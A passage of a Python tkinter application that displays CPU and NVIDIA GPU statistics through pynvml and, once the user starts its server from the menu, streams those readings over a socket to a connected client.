self.gpu_power_label2 = tk.Label(master=self.info_frame, text="", width=25,
bg='black', fg='white', relief='sunken', borderwidth=2, anchor=CENTER)
# place the appropriate labels in column 0 of the info_frame
self.cpu_util_label1.grid(row=1, column=0, sticky=W+E)
self.gpu_util_label1.grid(row=2, column=0, sticky=W+E)
self.gpu_temp_label1.grid(row=3, column=0, sticky=W+E)
self.gpu_clock_label1.grid(row=4, column=0, sticky=W+E)
self.mem_clock_label1.grid(row=5, column=0, sticky=W+E)
self.gpu_fan_speed_label1.grid(row=6, column=0, sticky=W+E)
self.gpu_power_label1.grid(row=7, column=0, sticky=W+E)
# _____________________________________________________________
# calls the function update_label_text() to get the info for the labels in column 1, change the text of the
# appropriate label and places the labels in column 1 of info_frame
# Note: A separate function was needed here in order to regularly update the information every 1 second
# with .after()
self.update_label_text()
def settings_menu(self):
self.settings_window = Toplevel()
self.settings_window.title('Settings')
self.settings_window.resizable(False, False)
self.settings_window.attributes("-topmost", 1)
settings_w = 240
settings_h = 50
wlx = self.winfo_x()
wly = self.winfo_y()
ww = self.winfo_width()
wh = self.winfo_height()
x = (wlx) + ((ww/2)-(settings_w/2))
y = (wly) + ((wh/2)-(settings_h/2))
self.settings_window.geometry("%dx%d+%d+%d" % (settings_w, settings_h, x, y))
self.settings_window.configure(bg='black')
self.settings_window.columnconfigure(0, weight=1)
self.settings_window.rowconfigure(0, weight=0)
self.ipconfiglabel = Label(master=self.settings_window, text="Server ip: ", width=10, bg='black',
fg='white', borderwidth=2, anchor=CENTER)
self.servconfig = Entry(master=self.settings_window, insertbackground='white', width=25, bg='black',
fg='white', relief='sunken', borderwidth=2)
self.servconfig.focus_set()
self.done_button = Button(master=self.settings_window, text='Done', command=self.get_serv_config)
self.ipconfiglabel.grid(row=0, column=0, sticky=W + E)
self.servconfig.grid(row=0, column=1, sticky=W + E)
self.done_button.grid(row=1, column=1)
def get_serv_config(self):
self.servip = self.servconfig.get()
self.settings_window.destroy()
# Gets the current gpu values every second and updates the appropriate label text
# if allowSending is true then the data is sent using send_data()
def update_label_text(self):
new_text = []
for i in self.info_frame.children.values():
if i == self.cpu_util_label2:
new_text.insert(0, psutil.cpu_percent())
self.cpu_util_label2.configure(text="{} %".format(new_text[0]))
self.cpu_util_label2.grid(row=1, column=1, sticky=W+E)
if self.allowSending:
new_text.insert(0, "cpu_util")
self.send_data(new_text)
elif i == self.gpu_util_label2:
new_text = self.get_gpu_utilization_rates()
self.gpu_util_label2.configure(text=new_text[0])
self.gpu_util_label2.grid(row=2, column=1, sticky=W+E)
if self.allowSending:
util_data = []
util_data.insert(0, new_text[0].memory)
util_data.insert(0,new_text[0].gpu)
util_data.insert(0, "gpu_util")
self.send_data(util_data)
elif i == self.gpu_temp_label2:
new_text = self.get_gpu_temps()
self.gpu_temp_label2.configure(text="{}\N{DEGREE SIGN}C".format(new_text[0]))
self.gpu_temp_label2.grid(row=3, column=1, sticky=W+E)
if self.allowSending:
new_text.insert(0, "gpu_temp")
self.send_data(new_text)
elif i == self.gpu_clock_label2:
new_text = self.get_gpu_clock_speed()
self.gpu_clock_label2.configure(text="{} Mhz".format(new_text[0]))
self.gpu_clock_label2.grid(row=4, column=1, sticky=W+E)
if self.allowSending:
new_text.insert(0, "gpu_clock")
self.send_data(new_text)
elif i == self.mem_clock_label2:
new_text = self.get_mem_clock_speed()
self.mem_clock_label2.configure(text="{} Mhz".format(new_text[0]))
self.mem_clock_label2.grid(row=5, column=1, sticky=W+E)
if self.allowSending:
new_text.insert(0, "mem_clock")
self.send_data(new_text)
elif i == self.gpu_fan_speed_label2:
new_text = self.get_gpu_fan_speed()
self.gpu_fan_speed_label2.configure(text="{} %".format(new_text[0]))
self.gpu_fan_speed_label2.grid(row=6, column=1, sticky=W+E)
if self.allowSending:
new_text.insert(0, "gpu_fan")
self.send_data(new_text)
elif i == self.gpu_power_label2:
new_text = self.get_gpu_power_usage()
self.gpu_power_label2.configure(text="{} Watts".format(new_text[0]))
self.gpu_power_label2.grid(row=7, column=1, sticky=W+E)
if self.allowSending:
new_text.insert(0, "gpu_power")
self.send_data(new_text)
self.after(1000, self.update_label_text)
# Uses the handle to get the gpu name and return it
def get_gpu_name(self):
self.gpu_name = []
self.name = pynvml.nvmlDeviceGetName(_handle)
self.gpu_name.append(self.name)
return self.gpu_name[0]
# Gets and returns the utilization rates of the GPU and video memory
def get_gpu_utilization_rates(self):
self.util_rates = []
self.util = pynvml.nvmlDeviceGetUtilizationRates(_handle)
self.util_rates.append(self.util)
return self.util_rates
# Gets and returns the GPU temperature in degrees celsius
def get_gpu_temps(self):
self.gpu_temps = []
self.temps = pynvml.nvmlDeviceGetTemperature(_handle, 0)
self.gpu_temps.append(self.temps)
return self.gpu_temps
# Gets and returns the GPU clock speed in Mhz
def get_gpu_clock_speed(self):
self.gpu_clock_speed = []
self.gpu_clock = pynvml.nvmlDeviceGetClockInfo(_handle, 0)
self.gpu_clock_speed.append(self.gpu_clock)
return self.gpu_clock_speed
# Gets and returns the memory clock speed in Mhz
def get_mem_clock_speed(self):
self.gpu_mem_clock = []
self.mem_clock = pynvml.nvmlDeviceGetClockInfo(_handle, 2)
self.gpu_mem_clock.append(self.mem_clock)
return self.gpu_mem_clock
# Gets and returns the fan speed as a percentage
def get_gpu_fan_speed(self):
self.gpu_fan_speed = []
self.fan_speed = pynvml.nvmlDeviceGetFanSpeed(_handle)
self.gpu_fan_speed.append(self.fan_speed)
return self.gpu_fan_speed
# Gets and returns the GPU current power usage in watts
def get_gpu_power_usage(self):
self.gpu_power_usage = []
self.power = pynvml.nvmlDeviceGetPowerUsage(_handle) # nvml value is returned as milliwatts
self.power = round(self.power/1000) # convert from milliwatts to watts and round
self.gpu_power_usage.append(self.power)
return self.gpu_power_usage
# Executes when the server thread is started via the file menu "Start Server" choice
def start_server(self):
self.sock.bind((self.servip, 25250))
self.sock.listen(1)
try:
print("Server Started.")
self.connection, self.client_ip = self.sock.accept()
self.allowSending = True
self.prep_gpu_name()
except OSError:
pass
# Gets the gpu name ready to be sent to the client
def prep_gpu_name(self):
device_name = []
device_name.append(str(self.get_gpu_name(), 'utf-8'))
device_name.insert(0, "gpu_name")
self.send_data(device_name)
# Handles sending the data and any exceptions which may occur
def send_data(self, new_text):
data = []
total_sent = 0
data = bytearray((str(new_text)), 'utf-8')
msg_len = len(data)
new_text.insert(0, msg_len)
data = bytearray((str(new_text)), 'utf-8')
while total_sent < len(data) and self.allowSending:
try:
sent = self.connection.send(data[total_sent:])
total_sent += sent
except ConnectionResetError:
messagebox.showerror("Connection Error", "Connection error. Connection was lost.")
self.allowSending = False
except ConnectionAbortedError:
messagebox.showerror("Connection Error", "Connection error. Connection was lost.")
self.allowSending = False
return None
# Closes the socket, joins the thread (if possible), and quits the program
def stop_server(self): # Disabled for now
self.allowSending = False
self.disconnect = True
self.sock.shutdown(socket.SHUT_RDWR)
self.exit()
# File menu exit choice
def exit(self):
self.sock.close()
if not self.disconnect:
self.allowSending = False
if self.server_thread.is_alive():
self.server_thread.join()
self.quit()
else:
self.disconnect = False
gpu_mon_py = App() # Create the App()
gpu_mon_py.config(menu=gpu_mon_py.menubar) # Configure the menu
gpu_mon_py.mainloop() # Start the App's mainloop
gpu_mon_py.exit() # exit()
pynvml.nvmlShutdown() # Shutdown pynvml
return None
# Call the main()
if __name__ == "__main__":
main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.